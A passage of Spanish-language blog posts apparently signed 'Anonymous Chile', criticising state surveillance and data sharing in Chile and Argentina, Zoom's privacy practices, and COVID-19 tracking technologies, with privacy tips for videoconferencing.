Entonces, para que el SENAME pueda transferir dichos datos a la ANI se requeriría de la autorización expresa por la ley, o por los apoderados/representantes de los NNA. Del mismo modo debe existir una autorización expresa en la ley que habilite al tratamiento de los datos personales sensibles o no de los NNA por parte de la ANI. Lo anterior, conforme tanto al artículo 4 como al artículo 20 de la Ley 19.628. Adicionalmente, para que la transferencia de los datos del SENAME a la ANI ocurra, dicha transferencia debe ser conforme a las finalidades del SENAME, sin embargo, reiteramos: dicha transferencia no puede ser comprendida dentro de las competencias y finalidades del SENAME, las que se relacionan principalmente con la protección y promoción de los derechos de los NNA.

Con razón de todo lo anterior, el tratamiento de datos que realice la ANI bajo este convenio con SENAME sería arbitrario e ilegal.

Obligaciones Internacionales de Derechos Humanos de Chile

El derecho a la vida privada es reconocido en diversos tratados internacionales de derechos humanos vigentes en Chile, entre ellos el Pacto Internacional de Derechos Civiles y Políticos, la Convención Americana de Derechos Humanos, como también en la Convención sobre los Derechos del Niño. Adicionalmente, el sistema internacional de protección de derechos humanos, tanto el universal como el regional, otorga a los NNA una protección especial derivada de su propia condición, lo que impone a Estado el deber de darles prioridad en su protección.

Pese a las obligaciones suscritas por Chile y la especial protección que se debe otorgar a NNA, el Estado de Chile recae en una conducta que estigmatiza y vulnera las garantías fundamentales de aquellos NNA que ingresan al SENAME. Institución que ha sido duramente criticada por el Comité de Derechos del Niño del Alto Comisionado de Derechos Humanos de Naciones Unidas en su informe del año 2018, que concluye se han cometido graves y sistemáticas violaciones de derechos humanos de miles de NNA que han estado bajo el cuidado de esta institución.

Adicionalmente, es necesario tener en cuenta comunicado del Relator Especial de las Naciones Unidas (ONU) para la Libertad de Opinión y de Expresión y la Relatora Especial para la Libertad de Expresión de la Comisión Interamericana de Derechos Humanos de la OEA, en la que se afirma que los Estados deben garantizar que la intervención, recolección y uso de información personal, incluidas todas las limitaciones al derecho de la persona afectada a acceder a información sobre las mismas, estén claramente autorizadas por la ley a fin de proteger a la persona contra interferencias arbitrarias o abusivas en sus intereses privados. Ello implica, que además, se debe establecer por ley los límites respecto a la naturaleza, alcance y duración de este tipo de medidas, las razones para ordenarlas, las autoridades competentes para autorizarlas, ejecutarlas y supervisarlas, y los mecanismos legales para su impugnación.

Por lo demás, la declaración conjunta sostiene que “el acceso a información personal de las personas sólo debe ocurrir en las circunstancias más excepcionales definidas en la legislación, y únicamente cuando se invoque la seguridad nacional, y en la que se establezca claramente los criterios que deben aplicarse para determinar los casos en los cuales este tipo de limitaciones resulta legítimo, teniendo en cuenta intereses protegidos, y cuando ese daño sea superior al interés general de la sociedad en función de mantener el derecho a la privacidad y a la libre expresión del pensamiento y circulación de información.”

Con razón en lo anterior, el convenio no establece medidas necesaria ni proporcionales, y pareciera estar motivado políticamente, buscando restringir las libertades y garantías de aquellos que merecen especial protección por parte del Estado.

¿Y el Acuerdo Nacional por la Infancia?

En 2018 el Gobierno de Sebastián Piñera dio a conocer el Informe del Comité de Derechos del Niño, indicando en aquella oportunidad que desde el primer día de su mandato, el Presidente habría priorizado a la niñez, refiriéndose además al Acuerdo Nacional por la Infancia, en el que se dispusieron medidas que apuntaban principalmente a proteger de forma adecuada a los niñ@s en riesgo de vulneración de sus derechos o que ya habían sido vulnerados.

Posteriormente, el Gobierno de Chile se comprometió a dar cumplimiento a las recomendaciones formuladas por el Comité de Derechos del Niño en su respuesta al informe. Surge entonces la interrogante ¿Cómo pretende el Estado de Chile, y en particular el SENAME, garantizar la debida protección de los niños, niñas y adolescentes en riesgo con un convenio de este tipo en el que se expone información sensible de los mismos? La respuesta parece ser una: no se garantizan los derechos de quienes merecen especial protección por parte del Estado de Chile, y se continúan vulnerando ilegítimamente dichos derechos por la discriminación y estigmatización que significa ser considerado sujeto de particular peligro para la seguridad, y en definitiva, bajo de una vigilancia permanente por parte del Sistema de Inteligencia del Estado.

Todo lo que debes saber sobre la plataforma de vídeoconferencias Zoom

Publicada el 20/05/2020 - 02/08/2021 por Anonymous Chile

En las últimas semanas, Zoom (creada el 2011 y basada en la ciudad de San Jose, California) se ha vuelto una plataforma muy popular debido a la necesidad de trabajar y estudiar a distancia con motivo de los decretos de cuarentena alrededor de todo el mundo producto del COVID-19.

El pasado 26 de marzo, producto de una investigación del medio VICE, se dio a conocer que la plataforma en su versión para iOS (sistema operativo de dispositivos Apple) compartía datos con Facebook.

Los datos entregados por Zoom a Facebook estaban vinculados a: modelo de tu dispositivo, zona horaria, ciudad desde donde te conectas, además de tu sistema operativo.

Esta información era recopilada sin la autorización de las personas, con la intención de elaborar publicidad personalizada, lo cual no estaba especificado en sus políticas de privacidad (siendo corregido el pasado 28/03 acorde a las declaraciones del CEO de Zoom).

Pero eso no es todo

La plataforma carece de una política de datos segura y que garantice tu privacidad, -partiendo porque no te notifica que tus datos están siendo vendidos- y porque además no solo recopila información para ser enviada a anunciantes, sino que también recopila el contenido de las grabaciones en la nube, mensajes instantáneos, archivos, pizarras compartidas, nombres de las personas en la llamada y los documentos enviados mientras utilizas la plataforma, según indica Allen St. John para Consumer Report.

Por otro lado, se descubrió que la plataforma no es segura para evitar el envío de malware -programas maliciosos- a través de sus chats y que tampoco publica reportes de transparencia.

En paralelo, una investigación de The Intercept descubrió que el “cifrado de extremo a extremo” (E2E) del cual habla la plataforma no funciona, ya que es más bien cifrado de transporte (TLS).

¿Qué quiere decir eso?

Que tu conexión a la plataforma está cifrada de la misma manera que cuando entras a un sitio web HTTPS en tu navegador. Esto implica que Zoom puede acceder al contenido de video y audio de tus reuniones.

Para que tu reunión de Zoom esté cifrada de extremo a extremo, el contenido y la capacidad de descifrarlo solo deberían verlo los participantes de la reunión (y hasta el momento no es así).

Te recomendamos:

Prueba con Jitsi. Es una plataforma de código abierto, gratis y sin límite en el tiempo de sesiones. La recomendamos porque tiene una mejor protección de datos personales (y no es necesario que crees una cuenta).

También puedes realizar videollamadas por XMPP, Matrix, TOX, Signal o Wire, aplicaciones de mensajeria con E2EE.

Recuerda cambiar tus contraseñas cada tres meses, tapa la cámara de tu computadora y la cámara frontal de tu teléfono y sumérgete en las profundidades de la autodefensa digital y la protección de datos.

Vigilancia indiscriminada como excusa para realizar análisis de inteligencia de amenazas terroristas en Argentina

Publicada el 19/05/2020 - 02/08/2021 por Anonymous Chile

La semana pasada la Ministra de Seguridad de la Nación, Sabina Frederick, explicó que, en el marco de la emergencia sanitaria, las fuerzas de seguridad realizan tareas de “ciberpatrullaje”. Esta semana se comenzaron a ver los primeros efectos de dicha política.

El 7 de abril, Kevin Guerra copió el texto de un meme que vio en Facebook, que contenía la palabra “saqueo”, y lo convirtió en un tweet. Dos días después, la Dirección Departamental de Investigaciones de la Policía Federal Argentina (PFA) le notificó que le habían iniciado una causa penal.

Este hecho y otras noticias sobre la actividad policial de vigilancia en redes sociales pusieron en debate la legalidad de esta práctica. La respuesta del Ministerio de Seguridad de la Nación fue que es similar al patrullaje policial y que solo se hace sobre las denominadas “fuentes abiertas”. De esta manera se reconoció que se puso en marcha un sistema de control de toda la actividad en las redes sociales, basado en búsquedas aleatorias de frases o palabras claves para detectar la comisión de delitos, como saqueos.

El denominado “ciberpatrullaje”, la vigilancia masiva de redes sociales, es una práctica de inteligencia con base en información de fuente abierta. Esta información es recogida del ámbito público para analizarla y producir inteligencia: los datos se vinculan y son analizados para determinar si hay o no una amenaza. Es inteligencia porque se realiza de manera anónima y sobre personas identificadas. No deja de ser una actividad de inteligencia porque la vigilancia gire sobre el ámbito público.

Pero las actividades de vigilancia masiva están prohibidas. Solo están permitidas las tareas de inteligencia criminal orientadas a intervenir sobre amenazas criminales concretas. Los programas que se utilizan para recoger palabras o frases no tienen capacidad de identificar el contexto ni la razón por las que las personas las usan. Esto vuelve muy peligroso la vigilancia al azar, como ocurrió de hecho en el caso de Kevin. Y aunque luego la participación humana revise las comunicaciones, sólo puede hacerlo después de captar y revisar miles de comunicaciones irrelevantes. Las noticias así lo demuestran.

Por eso, el Ministerio de Seguridad de la Nación y las fuerzas de seguridad sólo tienen competencia para realizar tareas de inteligencia criminal atadas a una hipótesis o amenaza específica y respetando las restricciones que establece la ley de inteligencia. Pero la inteligencia, como implica una intrusión en la privacidad, nunca es una práctica de pesca. En el caso del denominado “ciberpatrullaje” ni siquiera está claro, porque no ha sido informado públicamente cómo se está haciendo la vigilancia, si de manera artesanal o con un software, ni con qué herramientas, parámetros o mecanismos de control.

Además es necesario hacer otra aclaración. Las tareas de vigilancia y/o inteligencia en fuentes abiertas (Open Source Inteligence – OSINT) y en redes sociales (Social Media Intelligence-SOCMINT) pueden afectar los derechos de quienes interactúan en el ámbito digital, como la privacidad y la libertad de expresión. Que estas tareas se realicen sobre contenidos que las y los usuarios colocan en el espacio público, “abierto”, no las convierte automáticamente en legales. El hecho de que se trate de un ámbito público no habilita la vigilancia estatal masiva e intrusiva, de la misma forma que estar parado en la vereda no habilita a las fuerzas de seguridad a fotografiar o seguir personas si no hay una hipótesis delictiva previa. Tampoco sería admisible que la policía se acercara a escuchar las conversaciones entre las personas reunidas en una plaza o que se infiltrara en manifestaciones públicas. En el espacio público también hay control de las tareas de vigilancia, por ejemplo a través de identificaciones y uniformes..-

En el caso de Kevin Guerra, la PFA sometió a una investigación penal expresiones resguardadas constitucionalmente y esto fue convalidado por la fiscalía. Emitir una opinión en un ámbito público no puede, sin más, ser objeto de seguimiento, y menos, puede ser causa suficiente para la apertura de una investigación criminal. Y aun cuando el efecto de estas prácticas en otros casos no sea tan directo, también es claro que son intimidatorias y desalientan la participación y la opinión política. El sistema de justicia tiene que cumplir su función de protección de garantías, sobre todo en estos casos en los que se pone en juego una ampliación de las facultades estatales de vigilancia.

Además, hay que dudar realmente de la eficacia de estas estrategias para prevenir delitos; razón por la cual el Ministerio de Seguridad no puede subestimar el impacto negativo de estas prácticas policiales, que cercenan el debate público.

Estos y otros elementos hacen que sea altamente peligroso el uso de estas herramientas, que luego se transforman en causas e investigaciones judiciales. Su uso implica ampliar irrazonablemente las facultades de vigilancia estatal, sin un marco normativo claro, y con graves afectaciones para los derechos.

Tu privacidad en venta, siempre estás siendo observado: Consejos de seguridad en videoconferencias

Publicada el 19/05/2020 - 02/08/2021 por Anonymous Chile

El coronavirus ha propiciado que millones de personas a lo largo y ancho del mundo estén viviendo encerrados en sus casas. Con limitada presencia e interacciones a distancia, solo la tecnología ha permitido que entre todos sigamos conectados. ¿Cómo hacer del mundo virtual que habitamos un espacio seguro? Frente a esto hemos realizado una guía especializada para que usted, querido lector y lectora, se cuide en tiempos de hiperconexión.

En las últimas semanas, las plataformas de videoconferencias han tenido un inesperado alcance debido a que gran parte del mundo se encuentra en cuarentena. Entre ellas han sido particularmente relevantes Zoom y Houseparty.

Las prácticas y políticas de uso y privacidad de estas plataformas han presentado demasiados problemas. Esperamos que esto cambie, pero de momento el riesgo para los usuarios y las organizaciones que usen esas plataformas es mayor que los beneficios del uso.

Para tener videoconferencias seguras, es importante tener un abanico de factores en consideración:

  1. Lo primero es lo que nunca haces: leer las políticas de privacidad y términos y condiciones de las “apps” o plataformas que vas a usar. Si no entiendes mucho lo que mencionan, consulta en sus sitios web o artículos de terceros que hayan analizado dichos programas o servicios.
  2. En ocasiones, cuando el producto es “gratis” el producto eres tú. Puedes aceptar que el perfilamiento de usuarios existe con fines de negocios y que esto conlleva a que nuestros datos puedan ser enviados a terceros o incluso que nuestras interacciones sean utilizadas para identificar patrones entre personas. No pierdas esto de vista al escoger qué plataformas usar y cómo quieres utilizarlas.
  3. Considera que mientras menos datos recoja una plataforma y a menos terceros sean enviados, mejor. La recopilación de datos y su entrega a terceros a veces es necesaria o deseable, pero es importante saber hacia dónde pueden ir a parar los datos que generamos y tener cuidado si observamos que dicha recolección de datos no parece necesaria para el funcionamiento del programa o plataforma que los recoge.
  4. Para grupos de hasta 10 personas conectadas recomendamos Jitsi, plataforma de código abierto, gratis y sin límite en tiempo de sesiones. Tiene excelente protección de datos personales y ni siquiera obliga a crearte cuenta. Si solo se trata de 2 usuarios, también puedes realizar videollamadas por Signal, Wire o WhatsApp, las tres usan cifrado de extremo a extremo. Ojo que WhatsApp puede compartir metadata con Facebook al ser parte de la misma compañía, Facebook Inc.
  5. En casos en que se necesiten conferencias de más de 10 participantes, nos parece que Google Meet o Hangouts, BlueJeans, Canvas, Cisco Webex y Go2Meeting son interesantes alternativas a Zoom, aunque el modelo de Google también implica recopilación de datos y las otras alternativas son todas de pago.
  6. Si una organización, educativa, laboral o de otro tipo, te obliga a usar determinada app o plataforma, recuerda que esa organización debe asumir la responsabilidad por dicha obligación, hazle saber formalmente a los tomadores de decisión si no estás de acuerdo con los riesgos que implica y no olvides que tienes derecho a negarte a usar aquello con lo cual no estés de acuerdo, en la medida que no se tomen resguardos sobre la protección de la privacidad de las comunicaciones.
  7. Si estás en clases online o realizando teletrabajo, puedes no encender la cámara; expresar que no quieres que otras personas te vean; dejar explícito que no autorizas el uso de tu imagen o indicarlo en un post-it a la vista. Todo esto se puede consensuar previamente con el encargado o moderador de la sesión, incluso creando un protocolo de reuniones o clases online.
  8. Infórmate de los recursos de protección y resguardo de privacidad con que cuenta el sistema que estás utilizando. Algunas plataformas permiten poner contraseña a las salas o llamadas, además de una identificación (ID) que solo tienen las personas invitadas a participar.
  9. Si una sesión es grabada, debe ser informado explícitamente, junto con los fines de dicho registro (ej. una clase online). Si debes compartir tu pantalla de computador con una presentación o para mostrar algún recurso, preocúpate de tener bien resguardadas las carpetas que tengas con información personal. ¡No las dejes a la vista!
  10. Puedes usar un mail exclusivo para crear cuentas en redes sociales, foros, plataformas o suscribirse a newsletters. Esto permite que no expongas tu información personal o de tu trabajo en caso de alguna filtración de datos, hackeo o malware desde alguna plataforma, y de paso regular el spam de tu casilla de correo.
  11. La persona que modere o convoque la videoconferencia debe estar pendiente de cualquier intrus@ que ingrese a una sesión sin autorización o invitación. Para complementar esto, puedes crear un mail especial para convocar a videoconferencias a determinadas personas.
  12. En las plataformas online puedes vivir discriminación, hostigamiento en línea, difusión de tu información sin consentimiento o algún tipo de agresión. Si te llegase a ocurrir guarda registro de lo ocurrido antes de cerrar la pestaña, registra fecha, hora e identificación del usuario que comete la agresión y repórtalo a la plataforma.

Dentro de lo posible, cambia tus contraseñas cada tres meses, tapa la cámara de tu computadora y la cámara frontal de tu teléfono si no las estás utilizando. Antes de una videoconferencia, intenta mantener tu micrófono y cámara apagado hasta confirmar que estás en la sesión indicada.

Frente a esto, se puede pensar que entre plataformas y personas hay una cuestión de confianza, ¿Entiendes sus términos y condiciones? ¿sabes quiénes te ven y escuchan? Recuerda que todas las partes tienen acceso a tu imagen, voz, textos y documentos que aportes a la conversación.

Privacidad por defecto: Una consideración importante en tiempos de pandemia

Publicada el 18/05/2020 - 02/08/2021 por Anonymous Chile

En la edición del pasado domingo 26 de abril del diario El Mercurio, Loreto Cox y Harald Beyer afirmaron que es momento de tolerar un riesgo de renuncia a la privacidad. A modo de respuesta a dicha columna y con el ánimo de explicar la existencia de una falsa dicotomía entre derechos fundamentales y protección a la vida de las personas, quisiéramos aportar algunos conceptos para reflexiones más informadas.

La humanidad se encuentra en un momento en que el procesamiento de datos sobre comportamiento y salud, tiene un enorme potencial, tanto de beneficio como de daño, como cualquier tecnología.

Es factible hacer uso de estos datos para fomentar el incremento de distancia física de manera personalizada sin afectar derechos fundamentales, respetando consentimiento, aminorando necesidad de cuarentenas generales y sin generar alto riesgo de segundos usos de la información, por dos razones.

La primera es simple: nadie quiere enfermar ni contagiar a sus cercanos. Por ello podríamos estar dispuestos a aportar voluntariamente señales a través de la tecnología disponible. Sin embargo, dichas señales deben ser necesarias para la finalidad y proporcionales a la afectación de nuestras libertades.

La otra razón es técnica: gracias a posibilidades de anonimización y control granular de datos que la tecnología pone a disposición de usuarios e instituciones. A menudo, para cada solución que parece condicionada a un tratamiento amplio de datos personales o sensibles, hay otra solución que cumple cabalmente la finalidad sin requerir tal nivel de riesgo.

Un buen ejemplo: la notificación de exposición en base a señales Bluetooth

Esta técnica novedosa utiliza Bluetooth (no GPS) para que cada persona informe, de manera segura y anónima, si está afectada por COViD19, y que otra persona, si ha estado cerca, tome medidas de aislamiento y se someta a exámenes.

A esto se le ha llamado rastreo de contactos (OMS) o notificación de exposición (Apple & Google, y es una versión electrónica de un proceso conocido en el ámbito de la salud epidemiológica. La versión en base a Bluetooth tiene la ventaja, a diferencia de lo sugerido en la columna de Beyer y Cox de no necesitar que el sistema revele la identidad de infectados. El sistema solo necesita avisar que se ha estado cerca, no requiere al estado o contratistas “acceder a información tan privada” ni expone la identidad de personas afectados frente a otras, eliminando posibilidad de discriminación. Este es el camino correcto.

Además, Cox y Beyer afirman que “en la vieja Europa, tan celosa de la privacidad de sus ciudadanos, hay ánimo de mover la frontera”, cuando ha sido precisamente al revés: la UE ha trabajado este tema vía un consorcio llamado PEPP-PT, donde una de esas P representa Privacidad, una consideración primaria. Europa está adoptando este esquema, con algunos países escogiendo la implementación de Apple & Google mientras otros han optado por la versión europea, ligeramente más centralizada.

China no es todo oriente:

Por otro lado, generalizar al continente asiático y omitir condiciones especiales de Corea del Sur, Hong Kong, Japón y Singapur es un error común. Estos países han mostrado contención de “la curva” gracias a factores que no son autoritarismo ni vigilancia, como: alto nivel de competencias en ciencias básicas entre habitantes, preparación debido a brotes epidémicos recientes, buen acceso a información pública, uso habitual de mascarillas y sistemas de salud universal.

Australia como demostración:

También es pertinente atender al éxito de la “app” australiana, descargada por millones en sus primeras horas, basada en Bluetooth y que va acompañada de una directiva prohibiendo que los datos resultantes salgan del país o que la policía o la Justicia puedan acceder a ellos. Esto contrasta significativamente con la política de privacidad de la “CoronApp” chilena, que en sus términos y condiciones permite que los datos estén guardados hasta por 15 años y pasen a manos de terceros. El éxito de la app australiana CovidSafe versus la tibia reacción a la app chilena demuestra que cuando se comunica bien la finalidad y se resguarda bien la privacidad los usuarios estamos dispuestos a usar la tecnología para protegernos y proteger, sin necesidad de que se nos vigile u obligue.

El petróleo del siglo XXI: los segundos usos de los datos

Hoy está en riesgo la seguridad y libertad de las personas e incluso de países completos. No perdamos de vista el gigantesco valor comercial, político y estratégico por segundos usos de estos datos y la consecuente presión para que entreguemos de manera amplia identidades, ubicaciones y vínculos a Estados o “grandes compañías de tecnologías” (citando la columna).

No es momento para tolerar “renuncias a la privacidad”. Es hora de consultar con expertos y entender todo lo que se puede hacer sin renunciar a los principios, valores y derechos fundamentales de las sociedades democráticas.

Luksic entrega polémico informe de Big Data al gobierno

Publicada el 15/05/2020 - 02/08/2021 por Anonymous Chile

Tiempo atrás La Tercera reveló que la empresa española Alto Data Analytics había elaborado ese reporte. Pero ¿quién lo mandató? El informe fue elaborado para Quiñenco y Rodrigo Hinzpeter traspasó la información al gobierno.

El jueves 19 de diciembre el ministro del Interior Gonzalo Blumel, militante de Evópoli, anunció a la prensa y al país que el gobierno le había entregado al Ministerio Público un informe de más de 100 páginas elaborado con tecnología «extraordinariamente sofisticada», que había monitoreado de cerca el comportamiento de casi cinco millones de usuarios de redes sociales desde el estallido social que se inició el 18 de octubre, que podría explicar en parte la supuesta intervención extranjera en la crisis chilena.

Al poco andar, la fiscalía dijo que no se trataba de información de inteligencia, sino que de un mero recopilado. Y pronto comenzaron a trascender algunos aspectos del informe que lo convirtieron en un ridículo público: que la supuesta intervención exterior, que el Presidente Piñera ha culpado desde el principio, se debía a influencia del K-Pop coreano, entre otras cosas.

Durante varios días nadie, ni en el gobierno ni en el mundo privado de las comunicaciones, quiso hacerse cargo de ese reporte. Pero el lunes 30 de diciembre La Tercera reveló la empresa que había entregado la información al gobierno: la agencia española Alto Data Analytics.

Sin embargo, ni ese diario ni otros medios se preguntaron por qué una agencia española entregaría información al gobierno, toda vez que no es oficialmente un proveedor del Estado de Chile.

Entonces, ¿cómo llegó ese informe al gobierno?

La mano de Luksic

El lunes 2 de diciembre se realizó una reunión especial en las dependencias de la Agencia Nacional de Inteligencia (ANI) en la calle Tenderini Nº 115. En una mesa dispuesta en forma de «U», se reunieron representantes de las Fuerzas Armadas, del Ministerio del Interior y de la ANI. Pero participaron tres personas más: el entonces subsecretario del Interior, Rodrigo Ubilla, el ex ministro de Interior y Defensa y actual miembro de la plana ejecutiva del Grupo Luksic, Rodrigo Hinzpeter, y un representante español de Alto Data Analytics.

¿El objetivo? Exponer las principales conclusiones del informe de Big Data de esa empresa.

Al día siguiente, el martes 3 de diciembre, se volvieron a reunir en el mismo lugar las mismas personas.

Lo que hasta ahora no se sabía era que ese informe de Big Data había sido elaborado originalmente para el Grupo Luksic, que desde mediados del año pasado tiene contratado los servicios de esa empresa.

El reporte elaborado por Big Data Analytics, con sede corporativa en Madrid, le pareció lo suficientemente seria a la plana mayor de Quiñenco, como para entregársela al gobierno, tarea que habría recaído precisamente en Rodrigo Hinzpeter, ex ministro del Interior y de Defensa durante el primer gobierno de Sebastián Piñera.

Quien recogió el guante en La Moneda fue Rodrigo Ubilla, entonces subsecretario del Interior, que en el primer gobierno de Piñera trabajó bajos las órdenes del propio Hinzpeter.

Se ha intentado en reiteradas ocasiones contactarse con Ubilla, pero tanto su abogado en el caso de las tierras mapuche como otros cercanos aseguraron que se encuentra fuera del país sin posibilidad de responder.

También se ha contactado al ministerio de Defensa –señalado originalmente como parte de la operación del informe de Big Data– pero funcionarios de esa repartición negaron vehementemente tener algo que ver con ese informe o saber de dónde provenía.

Y de la misma forma se intentó contactar a Quiñenco, empresa matriz del Grupo Luksic, para confirmar o descartar que el informe original de Big Data provenía desde las filas de esa empresa.

Consultada anoche la empresa respecto de este tema, se ha obtenido la siguiente respuesta:

«Quiñenco recibe insumos de diversos proveedores sobre los diferentes mercados y entornos en los que desarrolla sus actividades. A partir de los hechos del 25 de julio (envío de una bomba a nuestras oficinas), se contrataron servicios de Alto Analytics, una empresa internacional con amplia trayectoria y prestigio a nivel mundial. Ignoramos si dicha empresa presta servicios al Estado de Chile».

Luego de revisar los proveedores registrados en Mercado Público, se concluyó que la empresa no figura en sus registros.

Respecto a la segunda pregunta realizada a Quiñenco, los voceros de la empresa de Luksic decidieron guardar silencio.

Posteriormente, se efectuó una nueva pregunta a un funcionario de Quiñenco a través de whatsapp: «Se comenta que el informe de Big Data llegó a Quiñenco como parte de los servicios de la empresa española y que la compañía, en concreto Rodrigo Hinzpeter, habría estimado necesario que el gobierno conociera esa información», sin obtener respuesta alguna.

Después se insistió: «Te lo pongo de la siguiente manera: ¿puedes descartar de manera verídica que Rodrigo Hinzpeter no participó de esas dos reuniones el 2 y 3 de diciembre en calle Tenderini? O simplemente dejo constancia que respecto al segundo punto no hubo respuesta ni positiva ni negativa de parte de Quiñenco?».

La respuesta fue clara. Sólo responderían a la primera pregunta, que efectivamente la compañía cuenta con los servicios de Alto Data Analytics. Pero no quisieron confirmar ni desmentir que uno de sus altos ejecutivos, Rodrigo Hinzpeter, había traspasado la información del polémico informe al gobierno.

Tecnología contra el Coronavirus: derechos humanos mucho más que efecto colateral

Publicada el 14/05/2020 - 02/08/2021 por Anonymous Chile

La rápida acción para enfrentar la expansión del COVID-19 requiere de medidas excepcionales, pero no pueden ser antónimo del respeto de derechos fundamentales

Cuando el COVID-19 nos obliga a aislarnos socialmente para proteger la salud de todos y todas, surge la legítima pregunta de cómo puede la tecnología asistir un combate más efectivo a la pandemia. Desde la aceleración de la telemedicina a la predicción de riesgos de contagios, al control del aislamiento involuntario, a la eficiencia en la asignación de prioridad de testeo, la tecnología parece ofrecer un abanico atractivo de soluciones. Pero si la crisis es novedosa para la humanidad en sus desafíos, la respuesta debe venir de una experiencia acumulada por siglos de excesos y desaciertos.

Necesidad, adecuación y proporcionalidad en la respuesta tecnológica es lo que separa una crisis de salud global de una renuncia de los derechos fundamentales, tejido básico de sociedades como las nuestras, que se han jugado su sangre e historia por escapar del autoritarismo y garantizar una vida digna para todos. Las tecnologías de información pueden jugar un rol coadyuvante en el monitoreo y control de la pandemia, pero su implementación irresponsable puede impactar negativamente el ejercicio de los derechos humanos, particularmente la privacidad, el derecho a la integridad física y psíquica, y el derecho a no ser discriminado arbitrariamente (en el ámbito laboral, de salud, previsión social y acceso a beneficios sociales). Así lo señalaron el 16 de marzo pasado expertas y expertos en derechos humanos de Naciones Unidas, precisando que los Estados no deben abusar de las medidas de emergencia para vulnerar derechos humanos: “Si bien reconocemos la gravedad de la actual crisis de salud y reconocemos que el derecho internacional permite el uso de poderes de emergencia en respuesta a amenazas significativas, recordamos urgentemente a los Estados que cualquier respuesta de emergencia al coronavirus debe ser proporcionada, necesaria y no discriminatoria”.

La necesidad extraordinaria en este caso está representada por la emergencia sanitaria misma y que amenaza no solo la salud pública, si no también la estabilidad económica y social. Esto es particularmente cierto en los países de América Latina, con una fuerte precariedad laboral, representada por industrias extractivas y trabajo informal basado en el ingreso diario.

En cuanto a la adecuación del sistema que se proponga, lo que típicamente separa las buenas de las malas ideas es formular preguntas rigurosas y contextuales acerca de la idoneidad de los sistemas para alcanzar los objetivos propuestos, y un diseño que incorpore la experiencia médica, las instituciones de salud y los enfoques científicos desarrollados, para aumentar lo que se sabe que funciona y no trabajar excluyéndolos o desafiando la confianza de la población en ellos. Los sistemas que se desarrollen deben encontrarse al servicio de la respuesta médica y del uso proporcionado de controles sociales para limitar la transmisión. La tecnología por si sola no es efectiva si no va acompañada de contextos de gobernanza institucional que aseguren el cumplimiento de sus objetivos.

La credibilidad de las instituciones de salud pública juega un papel importante en el éxito del cambio de comportamiento y respuesta que se pueda desarrollar durante la pandemia. Desarrollos tecnológicos que prescindan o hagan cuestionar esa respuesta coordinada pueden terminar resultandos contraproducentes para su combate. Un efecto no deseado de intervenir con tecnologías es generar confusión o una falsa seguridad en la población sobre la capacidad de las tecnologías de realizar un control efectivo, conduciendo al relajo de otras medidas más estrictas. Lo último que desearíamos en medio de una pandemia es que las instituciones de salud pública tengan que competir por la legitimidad, ya sea con otros órganos del Estado o con terceros intermediarios de las tecnologías provistas.

El objetivo no es evitar el uso de la tecnología, si no que precaver que cualquier sistema digital que se desarrolle lo haga desde criterios médicos que se sabe funcionan -al menos en circunstancias limitadas, basado en experiencias previas de respuesta específicas- y se implementen en una forma bien institucionalizada para causar aumentos marginales en la capacidad de combatir la pandemia.

La experiencia internacional

El uso de tecnologías de vigilancia preestablecidas, como es el caso de China, Irán e Israel, resulta particularmente problemático. La emergencia no puede prestar ocasión a que se profundicen sistemas de control social implementados en forma oscura y sin mecanismos de rendición de cuentas, que usen la pandemia para realizar un lavado de imagen que les permita sobrevivir a la crisis con una renovada justificación autoritaria.

Además, hay que considerar que los países que se citan como ejemplos exitosos de contención de la pandemia a la fecha (China, Corea del Sur, Singapur y Taiwán) realizaron grandes inversiones en capacidad de testeo proactivo, infraestructura de respuesta y disponibilización de información confiable en forma coordinada, todos elementos que son citados por expertos como componentes vitales de una respuesta efectiva. El componente digital aporta solo una fracción de lo anterior y, por ejemplo en el caso de Corea, el despliegue de la Self-quarantine Safety Protection App a partir del 7 de marzo de 2020, se produce cuando las principales medidas de contención a través del testeo masivo y aislamiento de individuos y grupos infectados, ya se encontraban ampliamente desplegadas y la expansión de la pandemia mostraba signos relevantes de contención.

Una reflexión es necesaria en relación a la adecuación de la geolocalización como tecnología para el combate efectivo de la pandemia. Aquí cabe precisar que reportes de especialistas dan cuenta de que esta parece ser mucho menor a la que optimistas tecnológicos parecen atribuirle. Los datos que proveen las torres de celulares de las que se vale la telefonía móvil carecen de la granularidad requerida para monitorear contactos de 2 o 3 metros como los necesarios para el contagio del COVID-19; lo mismo sucede con personas que se conectan a una misma red WiFi. Un poco más precisas resultan en ciertas condiciones las redes de Bluetooth (usadas por ejemplo en Singapur). Las señales de GPS proveen un poco más de precisión, pero solo funcionan bien en el exterior, por lo que pueden determinar si dos personas estuvieron en un mismo edificio, pero no que tan cerca estuvieron la una de la otra.

Aproximaciones menos lesivas para el ejercicio de derechos son posibles de adoptar aprovechando el poder de los datos agregados para el combate de la pandemia. Ese es el tipo de trabajo que operadores de telefonía han estado desarrollando en Europa, en países como Alemania, Austria, Francia e Italia. En España, algunas de ellos han ofrecido sus capacidades de big data y de gestión de datos anonimizados y agregados de su red, datos de movilidad, centros de procesamiento de datos en la nube, así como capacidades de atención telefónica o digital para contener la expansión de la pandemia. Y la autoridad de Protección de Datos de la Unión Europa, señala a este respecto que: “Las reglas de protección de datos no obstaculizan las medidas tomadas en la lucha contra la pandemia de coronavirus”. Pero enfatiza que “incluso en estos momentos excepcionales, el controlador de bases de datos debe garantizar la protección de los datos personales de sus titulares”.

La más reciente iniciativa presentada en este sentido se trata de un sistema en desarrollo en Alemania, con miras a expandir su uso en toda Europa, que busca preservar la privacidad de la información, pero proveyendo una herramienta tecnológica útil al control de la pandemia. Funciona bajo el principio de trazar proximidad de casos comprobados de contagios, no a través de datos de geolocalización, si no midiendo proximidad en una red Bluethooth. Se trata de una App voluntaria que generará un identificador único que se almacenará en forma cifrada en los dispositivos en forma local. La App descargada en un dispositivo almacenará localmente información de contacto de proximidad con otros dispositivos y luego, cuando se confirme un caso en esa red de proximidad, los miembros recibirán un mensaje de alerta. A partir de ahí, el usuario tendrá dos opciones: entregar toda su data cifrada almacenada en su dispositivo para análisis científico del caso o, a partir de la alerta, pedir acceso al test y partir con las medidas de cuarentena si el resultado es positivo. A partir de abril se pretende comenzar a desplegar esta tecnología en forma interoperable a nivel europeo, con interfaces usuario a nivel nacional y con la información de diagnóstico almacenada por cada autoridad de salud nacional.

Proporcionalidad

Luego de evaluada las implicancias de adecuación de la tecnología, cabe la ponderación de la proporcionalidad de su uso atendida la afectación de distintos derechos. Ello implica considerar las regulaciones que acoten los plazos de las facultades extraordinarias, que lo sujeten a las condiciones específicas de la emergencia para que no se extiendan a largo plazo, en formas no controladas e indefinidas.

